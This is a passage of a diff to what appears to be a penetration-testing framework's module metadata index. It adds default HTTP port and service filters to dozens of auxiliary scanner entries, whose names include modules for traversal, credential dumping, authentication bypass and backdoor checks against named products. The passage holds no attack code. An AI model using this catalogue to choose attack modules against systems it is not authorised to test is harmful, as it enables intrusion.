80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/http/accellion_fta_statecode_file_read.rb", @@ -13836,6 +18343,21 @@ "platform": "", "arch": "", "rport": 8400, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-08-26 21:01:10 +0000", "path": "/modules/auxiliary/scanner/http/adobe_xml_inject.rb", @@ -13865,6 +18387,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/http/advantech_webaccess_login.rb", @@ -13898,6 +18435,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/http/allegro_rompager_misfortune_cookie.rb", @@ -13931,6 +18483,21 @@ "platform": "", "arch": "", "rport": 8161, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/http/apache_activemq_source_disclosure.rb", @@ -13963,6 +18530,21 @@ "platform": "", "arch": "", "rport": 8161, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/http/apache_activemq_traversal.rb", @@ -13999,8 +18581,23 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, - "mod_time": "2018-09-17 22:29:20 +0000", + "mod_time": "2018-10-05 03:00:40 +0000", "path": "/modules/auxiliary/scanner/http/apache_mod_cgi_bash_env.rb", "is_install_path": true, "ref_name": "scanner/http/apache_mod_cgi_bash_env", @@ -14035,6 +18632,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2018-08-27 13:11:22 +0000", "path": "/modules/auxiliary/scanner/http/apache_optionsbleed.rb", @@ -14069,6 +18681,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/http/apache_userdir_enum.rb", @@ -14099,6 +18726,21 @@ "platform": "", "arch": "", "rport": 7000, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/http/appletv_login.rb", @@ -14135,6 +18777,22 @@ "platform": "", "arch": "", "rport": 8095, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443, + 8095 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/http/atlassian_crowd_fileaccess.rb", @@ -14165,6 +18823,21 @@ "platform": "", "arch": "", "rport": 8080, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/http/axis_local_file_include.rb", @@ -14195,6 +18868,21 @@ "platform": "", "arch": "", "rport": 8080, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/http/axis_login.rb", @@ -14224,6 +18912,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2018-07-22 20:50:22 +0000", "path": "/modules/auxiliary/scanner/http/backup_file.rb", @@ -14255,6 +18958,21 @@ "platform": "", "arch": "", "rport": 8000, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-08-26 21:01:10 +0000", "path": "/modules/auxiliary/scanner/http/barracuda_directory_traversal.rb", @@ -14284,6 +19002,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/http/bavision_cam_login.rb", @@ -14313,6 +19046,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/http/binom3_login_config_pass_dump.rb", @@ -14347,6 +19095,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-08-26 21:01:10 +0000", "path": "/modules/auxiliary/scanner/http/bitweaver_overlay_type_traversal.rb", @@ -14376,6 +19139,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/http/blind_sql_query.rb", @@ -14407,6 +19185,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/http/bmc_trackit_passwd_reset.rb", @@ -14436,6 +19229,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/http/brute_dirs.rb", @@ -14465,6 +19273,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/http/buffalo_login.rb", @@ -14494,6 +19317,21 @@ "platform": "", "arch": "", "rport": 81, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-09-15 00:18:33 +0000", "path": "/modules/auxiliary/scanner/http/buildmaster_login.rb", @@ -14527,6 +19365,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/http/caidao_bruteforce_login.rb", @@ -14558,6 +19411,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/http/canon_wireless.rb", @@ -14587,6 +19455,12 @@ "platform": "", "arch": "", "rport": 443, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/http/cert.rb", @@ -14619,6 +19493,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2018-08-13 15:48:21 +0000", "path": "/modules/auxiliary/scanner/http/cgit_traversal.rb", @@ -14648,6 +19537,21 @@ "platform": "", "arch": "", "rport": 443, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/http/chef_webui_login.rb", @@ -14677,6 +19581,21 @@ "platform": "", "arch": "", "rport": 8008, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-11-01 15:05:49 +0000", "path": "/modules/auxiliary/scanner/http/chromecast_webserver.rb", @@ -14706,6 +19625,21 @@ "platform": "", "arch": "", "rport": 8008, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-11-01 15:05:49 +0000", "path": "/modules/auxiliary/scanner/http/chromecast_wifi.rb", @@ -14735,6 +19669,21 @@ "platform": "", "arch": "", "rport": 443, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/http/cisco_asa_asdm.rb", @@ -14766,6 +19715,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/http/cisco_device_manager.rb", @@ -14798,6 +19762,21 @@ "platform": "", "arch": "", "rport": 443, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2018-08-01 13:30:19 +0000", "path": "/modules/auxiliary/scanner/http/cisco_directory_traversal.rb", @@ -14829,6 +19808,21 @@ "platform": "", "arch": "", "rport": 443, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/http/cisco_firepower_download.rb", @@ -14858,6 +19852,21 @@ "platform": "", "arch": "", "rport": 443, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/http/cisco_firepower_login.rb", @@ -14890,6 +19899,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-11-09 03:00:24 +0000", "path": "/modules/auxiliary/scanner/http/cisco_ios_auth_bypass.rb", @@ -14919,6 +19943,21 @@ "platform": "", "arch": "", "rport": 443, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/http/cisco_ironport_enum.rb", @@ -14949,6 +19988,21 @@ "platform": "", "arch": "", "rport": 443, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/http/cisco_nac_manager_traversal.rb", @@ -14978,6 +20032,21 @@ "platform": "", "arch": "", "rport": 443, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2018-05-10 09:57:50 +0000", "path": "/modules/auxiliary/scanner/http/cisco_ssl_vpn.rb", @@ -15010,6 +20079,21 @@ "platform": "", "arch": "", "rport": 443, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/http/cisco_ssl_vpn_priv_esc.rb", @@ -15041,6 +20125,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/http/clansphere_traversal.rb", @@ -15071,6 +20170,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-12-19 16:48:41 +0000", "path": "/modules/auxiliary/scanner/http/cnpilot_r_web_login_loot.rb", @@ -15105,6 +20219,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/http/coldfusion_locale_traversal.rb", @@ -15135,6 +20264,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/http/coldfusion_version.rb", @@ -15166,6 +20310,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/http/concrete5_member_list.rb", @@ -15195,6 +20354,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/http/copy_of_file.rb", @@ -15225,6 +20399,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/http/crawler.rb", @@ -15254,6 +20443,21 @@ "platform": "", "arch": "", "rport": 443, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/http/dell_idrac.rb", @@ -15284,6 +20488,21 @@ "platform": "", "arch": "", "rport": 8080, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2018-08-03 20:23:33 +0000", "path": "/modules/auxiliary/scanner/http/dicoogle_traversal.rb", @@ -15313,6 +20532,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/http/dir_listing.rb", @@ -15342,6 +20576,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/http/dir_scanner.rb", @@ -15375,6 +20624,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-11-09 03:00:24 +0000", "path": "/modules/auxiliary/scanner/http/dir_webdav_unicode_bypass.rb", @@ -15404,6 +20668,21 @@ "platform": "", "arch": "", "rport": 2222, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-12-20 15:09:11 +0000", "path": "/modules/auxiliary/scanner/http/directadmin_login.rb", @@ -15434,6 +20713,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/http/dlink_dir_300_615_http_login.rb", @@ -15464,6 +20758,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/http/dlink_dir_615h_http_login.rb", @@ -15494,6 +20803,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-08-26 21:01:10 +0000", "path": "/modules/auxiliary/scanner/http/dlink_dir_session_cgi_http_login.rb", @@ -15525,6 +20849,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/http/dlink_user_agent_backdoor.rb", @@ -15557,6 +20896,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/http/dnalims_file_retrieve.rb", @@ -15586,6 +20940,21 @@ "platform": "", "arch": "", "rport": 2375, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2018-07-12 02:56:47 +0000", "path": "/modules/auxiliary/scanner/http/docker_version.rb", @@ -15615,6 +20984,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/http/dolibarr_login.rb", @@ -15646,6 +21030,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/http/drupal_views_user_enum.rb", @@ -15675,6 +21074,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/http/ektron_cms400net.rb", @@ -15707,6 +21121,21 @@ "platform": "", "arch": "", "rport": 9200, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/http/elasticsearch_traversal.rb", @@ -15736,6 +21165,12 @@ "platform": "", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/http/enum_wayback.rb", @@ -15765,6 +21200,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-12-19 16:53:02 +0000", "path": "/modules/auxiliary/scanner/http/epmp1000_dump_config.rb", @@ -15795,6 +21245,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-12-19 17:02:16 +0000", "path": "/modules/auxiliary/scanner/http/epmp1000_dump_hashes.rb", @@ -15825,6 +21290,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-12-23 00:14:27 +0000", "path": "/modules/auxiliary/scanner/http/epmp1000_get_chart_cmd_exec.rb", @@ -15855,6 +21335,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-12-23 00:14:27 +0000", "path": "/modules/auxiliary/scanner/http/epmp1000_ping_cmd_exec.rb", @@ -15885,6 +21380,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-12-23 00:14:27 +0000", "path": "/modules/auxiliary/scanner/http/epmp1000_reset_pass.rb", @@ -15914,6 +21424,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-12-19 16:48:41 +0000", "path": "/modules/auxiliary/scanner/http/epmp1000_web_login.rb", @@ -15943,6 +21468,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-08-26 21:01:10 +0000", "path": "/modules/auxiliary/scanner/http/error_sql_injection.rb", @@ -15972,6 +21512,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/http/etherpad_duo_login.rb", @@ -16003,6 +21558,21 @@ "platform": "", "arch": "", "rport": null, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/http/f5_bigip_virtual_server.rb", @@ -16034,6 +21604,21 @@ "platform": "", "arch": "", "rport": 443, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/http/f5_mgmt_scanner.rb", @@ -16063,6 +21648,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-08-26 21:01:10 +0000", "path": "/modules/auxiliary/scanner/http/file_same_name_dir.rb", @@ -16092,6 +21692,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/http/files_dir.rb", @@ -16124,6 +21739,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2018-09-21 12:44:10 +0000", "path": "/modules/auxiliary/scanner/http/frontpage_credential_dump.rb", @@ -16154,6 +21784,21 @@ "platform": "", "arch": "", "rport": null, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/http/frontpage_login.rb", @@ -16183,6 +21828,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/http/gavazzi_em_login_loot.rb", @@ -16213,6 +21873,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/http/git_scanner.rb", @@ -16242,6 +21917,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/http/gitlab_login.rb", @@ -16271,6 +21961,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/http/gitlab_user_enum.rb", @@ -16302,6 +22007,21 @@ "platform": "", "arch": "", "rport": 4848, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/auxiliary/scanner/http/glassfish_login.rb", @@ -16334,6 +22054,21 @@ "platform": "", "arch": "", "rport": 4848, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + 